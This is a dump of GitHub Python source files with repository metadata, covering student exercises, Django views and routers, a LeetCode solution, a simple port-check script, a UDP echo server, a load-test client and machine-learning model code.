5\nsockmod.settimeout(timeout)\n\nhostip = input(\"Provide the IP Address: \")\nportno = int(input(\"Provide port number: \"))\n\ndef portScanner(portno):\n if sockmod.connect_ex((hostip, portno)) == 1:\n print(\"Port closed\")\n else:\n print(\"Port open\")\n\nportScanner(portno)","repo_name":"jusehcardozo/OpsChallenge401","sub_path":"Challenge44.py","file_name":"Challenge44.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72055606854","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\"\"\"This module named 1-Square.py\n Created on Wednesday, September 21, 2022\n @author: Daisy Chipana Lapa\n\"\"\"\n\n\nclass Square:\n \"\"\"This class is named Square\n Attributes:\n Instantiation with optional size: def __init__(self, size=0):\n \"\"\"\n def __init__(self, size=0):\n \"\"\"function constructor __init_\n Args:\n size: is private attribute\n Returns:\n * if size must be an integer, raise a TypeError exception\n * if size is less than 0, raise a ValueError exception\n \"\"\"\n if isinstance(size, int) is not True:\n raise TypeError(\"size must be an integer\")\n elif size < 0:\n raise ValueError(\"size must be >= 0\")\n else:\n self.__size = size\n\n def area(self):\n \"\"\"Public instance method named area\n Args:\n self: Variable that refers to the class name\n Returns:\n The current square area\n \"\"\"\n area_square = self.__size ** 2\n return area_square\n","repo_name":"DaisyGeraldine/holbertonschool-higher_level_programming","sub_path":"python-classes/3-square.py","file_name":"3-square.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"72577294212","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .views import home, post, category, about, base\n\nurlpatterns = [\n path('', base),\n path('home/', home),\n path('about/', 
about),\n path('blog/', post),\n path('category/', category)\n\n]","repo_name":"shivamjos1994/iBlogs","sub_path":"iblogs/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24168725674","text":"from django.contrib import admin\n\nfrom .models import Location, Phone\n\n\nclass LocationsFilter(admin.SimpleListFilter):\n title = 'Расположение'\n parameter_name = 'location'\n\n def lookups(self, request, model_admin):\n qs = model_admin.get_queryset(request)\n\n unique_locations_pks = qs.values_list('location').distinct()\n\n unique_locations = Location.objects.filter(\n pk__in=unique_locations_pks\n ).prefetch_related(\n 'room').prefetch_related(\n 'cabinet__room__building')\n\n for location in unique_locations:\n yield (location.pk, location)\n\n def queryset(self, request, queryset):\n if self.value() is not None:\n return queryset.filter(location_id=self.value())\n\n\nclass EmptyPunchBlocksFilter(admin.SimpleListFilter):\n title = 'Занятость'\n parameter_name = 'empty'\n\n def lookups(self, request, model_admin):\n return (\n (0, 'Свободные'),\n (1, 'Занятые'),\n )\n\n def queryset(self, request, queryset):\n if self.value() is not None:\n get_empty = True if self.value() == '0' else False\n queryset = queryset.filter(main_source__pbxport__isnull=get_empty)\n\n return queryset\n\n\nclass EmptyPBXPortsFilter(admin.SimpleListFilter):\n title = 'Занятость'\n parameter_name = 'ports_empty'\n\n def lookups(self, request, model_admin):\n return (\n (0, 'Свободные'),\n )\n\n def queryset(self, request, queryset):\n get_empty = True if self.value() == '0' else False\n\n if get_empty:\n phones = Phone.objects.filter(main_source__isnull=False)\n exclude_list = [x.main_source_id for x in phones]\n\n queryset = queryset.exclude(pk__in=exclude_list)\n\n return 
queryset\n","repo_name":"ivnglkv/cross_register","sub_path":"journal/admin_filters.py","file_name":"admin_filters.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"21351841068","text":"# -*- coding: utf-8 -*- \n\"\"\"\nDescription: LC00391 - 完美矩形\nURL: https://leetcode-cn.com/problems/perfect-rectangle/\nCreator: HarryUp\nCreate time: 2021-11-16 20:07:23\nContent:\n# 给你一个数组 rectangles ,其中 rectangles[i] = [xi, yi, ai, bi] 表示一个坐标轴平行的矩形。这个矩形的左下顶点是\n# (xi, yi) ,右上顶点是 (ai, bi) 。 \n# \n# 如果所有矩形一起精确覆盖了某个矩形区域,则返回 true ;否则,返回 false 。 \n# \n# \n# 示例 1: \n# \n# \n# 输入:rectangles = [[1,1,3,3],[3,1,4,2],[3,2,4,4],[1,3,2,4],[2,3,3,4]]\n# 输出:true\n# 解释:5 个矩形一起可以精确地覆盖一个矩形区域。 \n# \n# \n# 示例 2: \n# \n# \n# 输入:rectangles = [[1,1,2,3],[1,3,2,4],[3,1,4,2],[3,2,4,4]]\n# 输出:false\n# 解释:两个矩形之间有间隔,无法覆盖成一个矩形。 \n# \n# 示例 3: \n# \n# \n# 输入:rectangles = [[1,1,3,3],[3,1,4,2],[1,3,2,4],[3,2,4,4]]\n# 输出:false\n# 解释:图形顶端留有空缺,无法覆盖成一个矩形。 \n# \n# 示例 4: \n# \n# \n# 输入:rectangles = [[1,1,3,3],[3,1,4,2],[1,3,2,4],[2,2,4,4]]\n# 输出:false\n# 解释:因为中间有相交区域,虽然形成了矩形,但不是精确覆盖。 \n# \n# \n# \n# 提示: \n# \n# \n# 1 <= rectangles.length <= 2 * 10⁴ \n# rectangles[i].length == 4 \n# -10⁵ <= xi, yi, ai, bi <= 10⁵ \n# \n# Related Topics 数组 扫描线 👍 180 👎 0\n\n\"\"\"\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom collections import defaultdict\n\n\nclass Solution(object):\n def isRectangleCover(self, rectangles):\n \"\"\"\n :type rectangles: List[List[int]]\n :rtype: bool\n \"\"\"\n minx, miny, maxa, maxb, area = rectangles[0][0], rectangles[0][1], rectangles[0][2], rectangles[0][3], 0\n count = defaultdict(int)\n for rectangle in rectangles:\n x = rectangle[0]\n y = rectangle[1]\n a = rectangle[2]\n b = rectangle[3]\n count[(x, y)] += 1\n count[(x, b)] += 1\n count[(a, y)] += 1\n count[(a, b)] += 1\n minx = min(minx, x)\n miny = min(miny, y)\n maxa = max(maxa, a)\n maxb = max(maxb, b)\n area 
+= (b - y) * (a - x)\n if area != (maxa - minx) * (maxb - miny) or count[(minx, miny)] != 1 or count[(minx, maxb)] != 1 or count[\n (maxa, miny)] != 1 or count[(maxa, maxb)] != 1:\n return False\n del count[(minx, miny)], count[(minx, maxb)], count[(maxa, miny)], count[(maxa, maxb)]\n return all(cnt == 2 or cnt == 4 for cnt in count.values())\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n\n\ns = Solution()\nrec = [[1, 1, 3, 3], [3, 1, 4, 2], [3, 2, 4, 4], [1, 3, 2, 4], [2, 3, 3, 4]]\nprint(s.isRectangleCover(rec))\n","repo_name":"JulyHarry/PythonNoob","sub_path":"LeetCode/leetcode/editor/cn/LC00391_PerfectRectangle.py","file_name":"LC00391_PerfectRectangle.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40408484331","text":"# coding: utf-8\n\"\"\"Defines the OnedataFS opener.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\n__all__ = [\"OnedataFSOpener\"]\n\nfrom fs.opener import Opener\n\nfrom six.moves.urllib.parse import parse_qs, urlparse\n\nfrom ._onedatafs import OnedataFS\n\n\nclass OnedataFSOpener(Opener):\n \"\"\"\n Opener for OnedataFS.\n\n Implementation of PyFilesystem opener for OnedataFS. 
Allows to\n pass URI's in the form:\n `onedatafs://ONEPROVIDER_HOST:PORT?token=ACCESS_TOKEN&...`\n \"\"\"\n\n protocols = [\"onedatafs\"]\n\n def open_fs(self, fs_url, parse_result, writeable, create, cwd):\n \"\"\"Create instance of OnedataFS using opener URI.\"\"\"\n ofs = urlparse(fs_url)\n if ofs.scheme != \"onedatafs\":\n raise \"Invalid OnedataFS scheme\"\n\n host = ofs.hostname\n port = ofs.port or 443\n args = parse_qs(ofs.query)\n token = args[\"token\"][0]\n del args[\"token\"]\n cli_args = \"\"\n for k in args:\n v = args[k][0]\n if v == 'false':\n continue\n elif v == 'true':\n cli_args += \" --\" + k\n else:\n cli_args += \" --\" + k + \" \" + v\n\n return OnedataFS(host, token, port=port, cli_args=cli_args)\n","repo_name":"onedata/fs-onedatafs","sub_path":"fs/onedatafs/opener.py","file_name":"opener.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"26101450246","text":"import os, shutil\n\nsource_folder = os.path.join(os.getcwd(), \"prediction dataset\")\ndestination_folder = os.path.join(os.getcwd(), \"training dataset\")\nsubfolders = ['train', 'test', 'val']\n\nfor subfolder in subfolders:\n print('working on {}.'.format(subfolder))\n image_files = os.listdir(os.path.join(source_folder, subfolder, 'images'))\n label_files = os.listdir(os.path.join(source_folder, subfolder, 'labels'))\n for image_file in image_files:\n # Copy the image file from source to destination\n shutil.copyfile(os.path.join(source_folder, subfolder, 'images', image_file), os.path.join(destination_folder, subfolder, 'images', image_file))\n for label_file in label_files:\n # Copy the label file from source to destination and modify it to be yolo compliant\n dest_file = os.path.join(destination_folder, subfolder, 'labels', label_file)\n shutil.copyfile(os.path.join(source_folder, subfolder, 'labels', label_file), dest_file)\n with open(dest_file, 'r') as lbls:\n lines = 
lbls.readlines()\n copy = lines[0].split()\n del lines[0]\n with open(dest_file, 'w') as file:\n file.writelines(copy[0]+'\\t'+copy[1]+'\\t'+copy[2]+'\\t'+copy[3]+'\\t'+copy[4])\n\n\n \n\n\n","repo_name":"cchandel-dev/Visual-Search-Research","sub_path":"machine learning/prediction set to training set.py","file_name":"prediction set to training set.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5535219504","text":"#This program will let a user play the high/low game\r\n#Created by: Chris Caponi\r\ngamesPlayed = 0 ###############################\r\ngamesWon = 0 #used to calculate end results# \r\nwinPerc = 0 ###############################\r\nagain = True\r\n #the program will repeat upon player input\r\nwhile again: \r\n\r\n import random\r\n secret = random.randrange(1,64) #the program will generate a random # from 1-64 inclusive.\r\n print(\"I am thinking of a number in the range of 1-64 inclusive.\")\r\n print(\"You have 7 tries to guess it.\")\r\n guess = int(input(\"What is your guess? \"))\r\n guesses = 1 #keeps track of number of guesses\r\n print(secret)\r\n \r\n\r\n \r\n for x in range(1,8): #the following code will only repeat 7 times.\r\n while (guess < 1 or guess > 64): #prevents player from moving on thru the game until entering valid input.\r\n guess = int(input(\"Your guess was outside the range, try again. \"))\r\n if (guess == secret): #when player guesses correct number, they recieve the following message w/ how many attempts it took. 
\r\n print(\"Congrats, you are a winner in\", guesses, \"tries!!\")\r\n gamesWon = gamesWon + 1 #adds a win after guessing the correct number.\r\n break\r\n elif (guess > secret): #provides hints as to wether or not the player guessed too high.\r\n print(\"Sorry, your guess was too high.\")\r\n guesses = guesses + 1 #tracks each attempt.\r\n if (guesses == 8):\r\n break\r\n else:\r\n guess = int(input(\"What is your guess? \"))\r\n elif (guess < secret): #provides hints as to wether or not the player guessed too low.\r\n print(\"Sorry, your guess was too low.\")\r\n guesses = guesses + 1 #tracks each attempt.\r\n if (guesses == 8):\r\n break\r\n else:\r\n guess = int(input(\"What is your guess? \"))\r\n\r\n gamesPlayed = gamesPlayed + 1 #######################\r\n winPerc = (gamesWon/gamesPlayed)*100 #Formulas for end game#\r\n ####################### \r\n if (guess == secret): #if player guesses the number, they will be asked to play again.\r\n answer = input(\"Enter yes to play again, anything else to quit. \")\r\n if (answer != \"yes\"): #if they choose to not play again, player will recieve win/loss ration and percentage.\r\n again = False\r\n print(\"You won {} out of {} for a winning percentage of {:.3f}%\".format(gamesWon, gamesPlayed, winPerc))\r\n elif (guesses == 8): #if player runs out of attempts, they will be asked if they want to play again.\r\n print(\"YOU LOSE!!\", \"The number was\",secret)\r\n answer = input(\"Enter yes to play again, anything else to quit. 
\")\r\n if (answer != \"yes\"): #if they choose to not play again, player will recieve win/loss ration and percentage.\r\n again = False\r\n print(\"You won {} out of {} for a winning percentage of {:.3f}%\".format(gamesWon, gamesPlayed, winPerc))\r\n \r\n \r\nprint(input(\"press enter to exit.\"))\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"crc4446/High-Low-Game","sub_path":"Lab 9.py","file_name":"Lab 9.py","file_ext":"py","file_size_in_byte":3225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28109653686","text":"import tensorflow as tf\nfrom tensorflow.keras.models import load_model, Model\nfrom tensorflow.keras.layers import Layer, Input, Conv2D, BatchNormalization, MaxPooling2D, ReLU, Flatten, Dense, Add, \\\n Concatenate, Embedding, LayerNormalization, MultiHeadAttention, Dropout\nfrom pathlib import Path\n\n########################################\n# SAVE/LOAD FUNCTION #\n########################################\ndef save_model(model, layer_index, CONST_SAVED_MODEL_DIR):\n # Save the trained model\n Path(f\"{CONST_SAVED_MODEL_DIR}_{layer_index}\").mkdir(parents=True, exist_ok=True)\n print(\"SAVE MODEL PATH\", f\"{CONST_SAVED_MODEL_DIR}_{layer_index}\")\n try:\n model.save(f\"{CONST_SAVED_MODEL_DIR}_{layer_index}\", save_format=\"tf\")\n except Exception:\n print(\"exception saved model to h5 format\")\n model.save(f\"{CONST_SAVED_MODEL_DIR}_{layer_index}/saved_model.h5\")\n\ndef load_saved_model(path):\n print(\"LOAD MODEL PATH\", path)\n if path != \"\" and path is not None:\n model = load_model(f\"{path}\")\n\n return model\n\n\n########################################\n# MODEL/LAYER #\n########################################\nclass BanHead(tf.keras.Model):\n def __init__(self, pattern, use_relu=False, config={}):\n super(BanHead, self).__init__()\n self._pattern = pattern\n self._use_relu = use_relu\n self._config = config\n\n def call(self, inputs):\n if 
inputs.dtype.base_dtype != self._compute_dtype_object.base_dtype:\n inputs = tf.cast(inputs, dtype=self._compute_dtype_object)\n\n if self._use_relu:\n # --- Add the relu here\n inputs = tf.keras.layers.ReLU()(inputs)\n dist = tf.keras.layers.ReLU()(self._pattern)\n else:\n dist = self._pattern\n\n # KL-divergence loss\n if self._config[\"loss\"] == \"kl\":\n kl = tf.keras.losses.KLDivergence(reduction=tf.keras.losses.Reduction.NONE)\n pattern_probs = tf.nn.softmax(dist, axis=-1)\n logits_probs = tf.nn.softmax(inputs, axis=-1)\n x = kl(pattern_probs, logits_probs)\n # x = kl(dist, inputs)\n x = tf.expand_dims(x, axis=-1)\n # MSE loss\n elif self._config[\"loss\"] == \"mse\":\n if self._config[\"num_of_pattern_per_label\"] == 1:\n x = (inputs - dist) ** 2\n x = tf.reduce_mean(x, 1, keepdims=True)\n else:\n x = (inputs - dist) ** 2\n x = tf.reduce_mean(x, 0)\n x = tf.reduce_mean(x, 1, keepdims=True)\n\n return x\n\nclass PatternModel(tf.keras.Model):\n def __init__(self, config, **kwargs):\n super(PatternModel, self).__init__(**kwargs)\n self._config = config\n\n def build(self, input_shape):\n self.variable = tf.Variable(\n initial_value=tf.ones(shape=(self._config[\"output_nodes\"],)),\n trainable=True if self._config[\"use_flexible_pattern\"] is True else False\n )\n # self._dense = Dense(self._config[\"output_nodes\"])\n super(PatternModel, self).build(input_shape)\n\n def call(self, inputs):\n if inputs.dtype.base_dtype != self._compute_dtype_object.base_dtype:\n inputs = tf.cast(inputs, dtype=self._compute_dtype_object)\n\n return inputs * self.variable\n # return self._dense(inputs)\n\ndef createPatternModel(config):\n output_nodes = config[\"output_nodes\"]\n\n inputs = []\n outputs = []\n for i in range(config[\"num_of_pattern_per_label\"]):\n input = Input(shape=output_nodes)\n inputs.append(input)\n output = PatternModel(config)(input)\n outputs.append(output)\n\n model = Model(inputs=inputs, outputs=outputs)\n return model\n\ndef 
createNormalModel(config):\n input_shape = config[\"input_shape\"]\n use_bias = config[\"use_bias\"]\n activation = config[\"activation\"]\n output_nodes = config[\"output_nodes\"]\n\n inputs = Input(shape=input_shape)\n x = Flatten()(inputs)\n out = Dense(output_nodes, use_bias=use_bias)(x)\n\n if activation == \"sigmoid\":\n out = tf.keras.activations.sigmoid(out)\n elif activation == \"tanh\":\n out = tf.keras.activations.tanh(out)\n\n model = Model(inputs=inputs, outputs=out)\n\n return model\n\ndef createModel(config):\n model = createNormalModel(config)\n\n return model","repo_name":"canboy123/ban","sub_path":"lib/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39742262704","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind(('localhost', 9999))\nwhile True:\n data, addr = s.recvfrom(1024)\n data = data.decode('utf-8')\n print('%s ==> %s' % (addr, data))\n reply = 'Hello, %s!' 
% data\n print('%s <== %s' % (addr, reply))\n s.sendto(reply.encode('utf-8'), addr)\ns.close()\n","repo_name":"ArisQ/learn-python","sub_path":"52_udp/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"26577028794","text":"from .models import Touristik_hudular, Category\n\ndef latest_news(request):\n latest_news = Touristik_hudular.chiqarish.all().order_by('-yozilgan_vaqti')\n kategoriyalar = Category.objects.all()\n\n context = {\n 'latest_news': latest_news,\n 'kategoriyalar': kategoriyalar\n }\n return context","repo_name":"ruzikulovdev/Sayyoh-kundaligi","sub_path":"Tourism/context_processor.py","file_name":"context_processor.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"20646576783","text":"import random\n\ndef pickRandom(range):\n randnum = random.randrange(range)\n return randnum\ndef flipManyCoins(numOfCoins):\n count = 0\n headCount = 0\n tailCount = 0\n while count < numOfCoins:\n if flipACoin() == \"heads\":\n headCount += 1\n else:\n tailCount += 1\n count += 1\n return 'You Had %d Tails and %d Heads!' % (tailCount, headCount)\n\ndef flipACoin():\n randNum = pickRandom(2)\n if randNum == 0:\n return \"heads\"\n else:\n return \"tails\"\n\ndef flipCoin(string):\n if string == \"fifty\":\n print(flipACoin())\n elif string == \"chance\":\n print(\"How many coins would you like to flip?\")\n answer = input()\n try:\n print(flipManyCoins(int(answer)))\n except ValueError:\n print(\"please enter a number\")\n flipCoin(\"chance\")\n\ndef promptUser():\n print(\"CoinFlip or Higher/Lower?(C/H)\")\n answer = input()\n if answer == \"C\":\n isCoinFlip()\n elif answer == \"H\":\n isHigherLower()\n\ndef isCoinFlip():\n print(\"Are You Playing for a 50/50 flip? 
(Y/n)\")\n Yn = input()\n if Yn == \"Y\":\n flipCoin(\"fifty\")\n elif Yn == \"n\":\n flipCoin(\"chance\")\n\ndef pickANum():\n print(\"Pick a number from 1-99\")\n answer = input()\n try:\n if int(answer) > 99:\n print (\"please pick a number from 1 to 99\")\n pickANum()\n else:\n aRand = pickRandom(101)\n if int(answer) < aRand:\n print(\"Lower!\")\n print(\"The Random Number Picked:\",aRand)\n elif int(answer) > aRand:\n print(\"Higher!\")\n print(\"The Number Picked:\", aRand)\n else:\n print(\"Whoa! You got even!\")\n except ValueError:\n print(\"please enter a NUMBER\")\n pickANum()\n\ndef numPicked():\n firstRand = pickRandom(101)\n secRand = pickRandom(101)\n print(\"Your random number is:\",firstRand)\n if firstRand < secRand:\n print(\"LOWER!\")\n print(\"The Higher Number Picked:\", secRand)\n else:\n print(\"HIGHER!\")\n print(\"The Lower Number Picked:\", secRand)\n\ndef isHigherLower():\n print(\"Do you want a number picked for you? (Y/n)\")\n if input() == \"Y\":\n numPicked()\n else:\n pickANum()\n\nprint(\"Welcome to Coin Toss or Higher Lower!\")\npromptUser()\n","repo_name":"insipx/100-Program-Challenge-Python-","sub_path":"HighLowHeadsTails/hlht.py","file_name":"hlht.py","file_ext":"py","file_size_in_byte":2380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11371599527","text":"import argparse\nimport asyncio\nimport collections\nimport uuid\n\nimport aiohttp\n\nConfig = collections.namedtuple('Config', ['url', 'read_concurrency', 'runs', 'load_rate'])\n\n\ndef read_config():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', help='target url of the load test', default='http://localhost:8080')\n parser.add_argument('--read_concurrency', type=int, help='number of concurrent reader', default=10)\n parser.add_argument('--runs', type=int, help='number of times single test is run', default=100)\n parser.add_argument('--rate', type=float, help='time in seconds to wait 
before firing the next test', default=2.0)\n\n args = parser.parse_args()\n\n return Config(url=args.target, read_concurrency=args.read_concurrency, runs=args.runs, load_rate=args.rate)\n\n\nasync def read_ncco(session, url, bucket_id, ncco_id):\n render_url = f'{url}/bucket/{bucket_id}/ncco/{ncco_id}/render'\n await session.get(render_url)\n\n\nasync def load_job(session, url, read_concurrency):\n # Create bucket\n create_bucket_url = f'{url}/bucket'\n bucket_id = str(uuid.uuid4())\n await session.post(create_bucket_url, json={'id': bucket_id})\n\n # Create NCCO\n ncco_body = {'ncco': '[{\"action\": \"talk\", \"text\": \"Hello World!\"}]'}\n create_ncco_url = f'{url}/bucket/{bucket_id}/ncco'\n\n res = await session.post(create_ncco_url, json=ncco_body)\n\n res_json = await res.json()\n ncco_id = res_json['ncco_id']\n\n # spin read_concurrency readers\n outstanding = []\n for _ in range(read_concurrency):\n task = asyncio.ensure_future(read_ncco(session, url, bucket_id, ncco_id))\n outstanding.append(task)\n\n # wait for readers\n await asyncio.gather(*outstanding)\n\n # delete bucket\n await session.delete(f'{url}/bucket/{bucket_id}')\n\n\nasync def run_test(config):\n # spin a load job every load_rate seconds\n outstanding = []\n\n async with aiohttp.ClientSession(raise_for_status=True) as session:\n for _ in range(config.runs):\n task = asyncio.ensure_future(load_job(session, config.url, config.read_concurrency))\n outstanding.append(task)\n asyncio.sleep(config.load_rate)\n\n await asyncio.gather(*outstanding)\n\n\ndef main():\n config = read_config()\n\n loop = asyncio.get_event_loop()\n future = asyncio.ensure_future(run_test(config))\n loop.run_until_complete(future)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lpedrosa/nccostorage","sub_path":"tests/load/test_heavy_read.py","file_name":"test_heavy_read.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} 
+{"seq_id":"74095880772","text":"from api.authentication.viewsets import (\n RegisterViewSet,\n LoginViewSet,\n ActiveSessionViewSet,\n LogoutViewSet,\n)\nfrom rest_framework import routers\nfrom api.user.viewsets import UserViewSet\n\nrouter = routers.SimpleRouter(trailing_slash=False)\n\nrouter.register(r\"edit\", UserViewSet, basename=\"user-edit\")\n\nrouter.register(r\"register\", RegisterViewSet, basename=\"register\")\n\nrouter.register(r\"login\", LoginViewSet, basename=\"login\")\n\nrouter.register(r\"checkSession\", ActiveSessionViewSet, basename=\"check-session\")\n\nrouter.register(r\"logout\", LogoutViewSet, basename=\"logout\")\n\nurlpatterns = [\n *router.urls,\n]\n","repo_name":"app-generator/django-react-soft-dashboard","sub_path":"django-api/api/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"44"} +{"seq_id":"868378683","text":"import sys\nimport csv\ndef main():\n check_command_line_arg()\n output = []\n try:\n with open(sys.argv[1], \"r\") as csv_file:\n csv_read = csv.DictReader(csv_file)\n for row in csv_read:\n split_name = row[\"name\"].split(\",\")\n output.append({\"first\":split_name[1].lstrip(), \"last\":split_name[0], \"house\":row[\"house\"]})\n # print(output)\n with open(sys.argv[2], \"w\") as output_file:\n csv_write = csv.DictWriter(output_file, fieldnames=[\"first\", \"last\", \"house\"])\n csv_write.writerow({\"first\" : \"first\", \"last\" : \"last\", \"house\" : \"house\"})\n for row in output:\n csv_write.writerow({\"first\" : row[\"first\"], \"last\" : row[\"last\"], \"house\" : row[\"house\"]})\n except FileNotFoundError:\n print(\"File Not Exist\")\n\n\n\n\n\n\ndef check_command_line_arg():\n if(len(sys.argv)) < 3:\n sys.exit(\"Too few command-line arguments\")\n if(len(sys.argv)) > 3:\n sys.exit(\"Too many command-line arguments\")\n if \".csv\" not in sys.argv[1] and \".csv\" not in sys.argv[2]:\n 
sys.exit(\"Not a CSV file\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"SubhashiniRajesh26/python_harvard-and-other-tasks","sub_path":"week6/scourgify/scourgify.py","file_name":"scourgify.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73550990532","text":"import os\r\n\r\nfrom django.conf import settings\r\nfrom django.shortcuts import redirect, render, HttpResponse\r\n\r\nfrom emee_manage import models\r\nfrom emee_manage.utils.form import UploadForm,UploadModelForm\r\n\r\ndef upload_form(req):\r\n if req.method == \"GET\":\r\n form = UploadForm()\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\": \"Form上传\",\r\n \"form\":form,\r\n \"req\":req,\r\n }\r\n )\r\n form = UploadForm(data=req.POST,files=req.FILES)\r\n if form.is_valid():\r\n img_obj = form.cleaned_data.get(\"img\")\r\n print(type(img_obj))\r\n db_img_path = os.path.join(\"static\",\"img\",img_obj.name)\r\n img_path = os.path.join(\"emee_manage\",db_img_path)\r\n f = open(img_path,mode=\"wb\")\r\n for chunk in img_obj.chunks():\r\n f.write(chunk)\r\n f.close()\r\n models.Boss.objects.create(\r\n name=form.cleaned_data['name'],\r\n age=form.cleaned_data['age'],\r\n img=db_img_path\r\n )\r\n return HttpResponse(\"上传成功\")\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\": \"Form上传\",\r\n \"form\":form,\r\n \"req\":req,\r\n }\r\n )\r\n\r\ndef upload_modelform(req):\r\n if req.method == \"GET\":\r\n form = UploadModelForm()\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\":\"ModelForm上传\",\r\n \"form\":form,\r\n \"req\":req\r\n }\r\n )\r\n # print(req.FILES)\r\n form = UploadModelForm(data=req.POST,files=req.FILES)\r\n if form.is_valid():\r\n form.save()\r\n return redirect(\"/city/list/\")\r\n return render(\r\n req,\r\n \"upload_form.html\",\r\n {\r\n \"title\":\"ModelForm上传\",\r\n \"form\":form,\r\n \"req\":req\r\n 
}\r\n )\r\n\r\ndef upload_list(req):\r\n queryset = models.City.objects.all().order_by(\"id\")\r\n return render(\r\n req,\r\n \"city_list.html\",\r\n {\r\n \"city_queryset\":queryset,\r\n \"req\":req,\r\n }\r\n )\r\n\r\ndef city_edit(req):\r\n i = req.GET.get(\"nid\")\r\n # print(i)\r\n if req.method == \"GET\":\r\n city = models.City.objects.filter(id=i).first()\r\n form = UploadModelForm(instance=city)\r\n return render(\r\n req,\r\n \"change.html\",\r\n {\r\n \"form\": form,\r\n \"title\": \"编辑城市\",\r\n \"req\": req,\r\n },\r\n )\r\n print(req.FILES)\r\n print(req.POST)\r\n return redirect(\"/city/list/\")\r\n # city = models.City.objects.filter(id=i).first()\r\n # form = UploadModelForm(data=req.POST, files=req.FILES, instance=city)\r\n # if form.is_valid():\r\n # form.save()\r\n # return redirect(\"/city/list/\")\r\n # return render(\r\n # req,\r\n # \"change.html\",\r\n # {\r\n # \"form\": form,\r\n # \"title\": \"编辑城市\",\r\n # \"req\": req,\r\n # },\r\n # )\r\n\r\n\r\n\r\ndef city_delete(req):\r\n i = req.GET.get(\"nid\")\r\n path = models.City.objects.filter(id=i).first().img\r\n q_path = os.path.join(str(settings.MEDIA_ROOT),str(path))\r\n models.City.objects.filter(id=i).delete()\r\n os.remove(q_path)\r\n return redirect(\"/city/list/\")","repo_name":"banxianjia/Django-Study","sub_path":"emee_manage/views/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"8837557657","text":"'''\nAlgorithmic Thinking, Part II\nProject 4. 
Computing global and local alignments\n\n@author: Yueleng & Kexin\n'''\n\n\ndef build_scoring_matrix(alphabet, diag_score, off_diag_score, dash_score):\n\t'''\n\t@input:\n\ta set of characters alphabet: A C G T - or Sigma union -\n\tdiag_score: M_{sigma, sigma}\n\toff_diag_score: M_{sigma, sigma'}\n\tdash_score: M_{sigma, -} = M_{-, sigma}\n\n\t@output: distionary of dictionaries.\n\t'''\n\tscores = {}\n\tscores['-'] = {'-': dash_score}\n\n\tfor let_a in alphabet:\n\t\tif let_a not in scores:\n\t\t\tscores[let_a] = {} #create a dictionary under scores[let_a]\n\t\tscores[let_a]['-'] = dash_score\n\t\tscores['-'][let_a] = dash_score\n\n\t\t# Fill in other keys for dictionary: scores[let_a]\n\t\tfor let_b in alphabet:\n\t\t\tif let_a == let_b:\n\t\t\t\tscores[let_a][let_b] = diag_score\n\t\t\telse:\n\t\t\t\tscores[let_a][let_b] = off_diag_score\n\n\treturn scores\n\ndef _clip(value, global_flag):\n\t'''\n\tLimit values to 0 when global_flag is not set\n\t'''\n\treturn value if global_flag else max(0, value)\n\n\ndef compute_alignment_matrix(seq_x, seq_y, scoring_matrix, global_flag):\n\t'''\n\t@input:\n\tseq_x, seq_y: whose elements share a common alphabet with the scoring matirx \n\tscoring matrix: output of func build_scoring_matrix\n\tglobal_flag: True/False. \n\t\t\t\t if True, use Algorithm from Q8\n\t\t\t\t if False, use Algorithm from Q12, i.e. 
